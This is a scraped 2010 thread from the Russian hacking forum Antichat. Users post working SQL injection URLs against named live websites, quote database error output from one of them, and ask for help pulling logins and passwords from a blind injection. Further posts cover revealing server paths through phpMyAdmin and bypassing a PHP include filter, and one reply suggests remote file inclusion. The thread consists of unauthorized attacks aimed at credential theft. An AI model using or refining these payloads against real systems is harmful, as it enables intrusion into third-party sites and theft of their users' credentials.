Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.04.2010, 18:02
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
мда
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10%20and%20%28select%201%2 0from%28select%20count%28*%29,concat%28table_name, floor%28rand%280%29*2%29%29x%20from%20information_ schema.tables%20group%20by%20x%29a%29--
|
|
|
11.04.2010, 18:03
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://warsong.ws/exchange/engine/repair.php?realm=1&guid=10+or+(select+count(*)+fro m+information_schema.tables+group+by+concat(table_ name,floor(rand(0)*2)))--
Data truncated for column 'guid' at row 1Duplicate entry 'achievement_reward1' for key 'group_key'
все понел?
|
|
|
|
11.04.2010, 18:07
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 159
Провел на форуме:
721727
Репутация:
397
|
|
Тоже самое выложил )))
|
|
|
|
11.04.2010, 18:07
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
да, спасибо большое !
|
|
|
|
11.04.2010, 18:24
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
как пути на сервере раскрыть ? есть доступ к phpmyadmin
phpmyadmin/phpinfo.php ничего не выводит...
кстати сервер под виндой
|
|
|
|
11.04.2010, 18:27
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
кстате /phpmyadmin/scripts/setup.php доступен ли и какая версия phpmyadmin-а
|
|
|
|
11.04.2010, 19:00
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
phpmyadmin 3.2.0.1, сервер Microsoft-IIS/6.0
/phpmyadmin/scripts/setup.php не доступен, этот файл удалён
|
|
|
|
11.04.2010, 20:10
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 16
Провел на форуме:
97465
Репутация:
0
|
|
Не могу вытащить логины да пароли из слепой скули
http://www.ollis.ru/index.php?rest=1')+AND+1=2+UNION+SELECT+0,1,2,3,4, 5%23
на 6 поле этом вылетает пустая страница.
Знаю что вывод из скули такой:
http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns LIMIT 1), 14)e) b)a--+
Версия:
http://www.ollis.ru/index.php?id=cabinet')+and+(1,2)=(Select*From(Sele ct+Name_Const(version(),1),Name_Const(version(),1) %20)a)%23&type=cabinet&action=lost_pw&mode=return_ from_hidden
Помогите вытащить пароли...нужно срочно....есть хочу=)))
Последний раз редактировалось MastaBass1; 11.04.2010 в 20:12..
|
|
|
|
11.04.2010, 22:42
|
|
Новичок
Регистрация: 12.03.2009
Сообщений: 12
Провел на форуме:
293510
Репутация:
2
|
|
Всем привет
есть массив /bla.php?s=sss
там дописывается инклудинг funtions.php тоесть ссылка получается такая /bla.php?s=sssfuntions.php вставляю %00 => /bla.php?s=sss%00 в ответ
Warning: require_once(sss\0funtions.php) [function.require-once]: failed to open stream: No such file or directory ....
есть ли возможность обойти фильтрацию ? |
|
|
|
11.04.2010, 22:50
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.
Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ DSU ]](/avatars/avatar43637.gif){kind=avatar}
![Отправить сообщение для [ DSU ] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
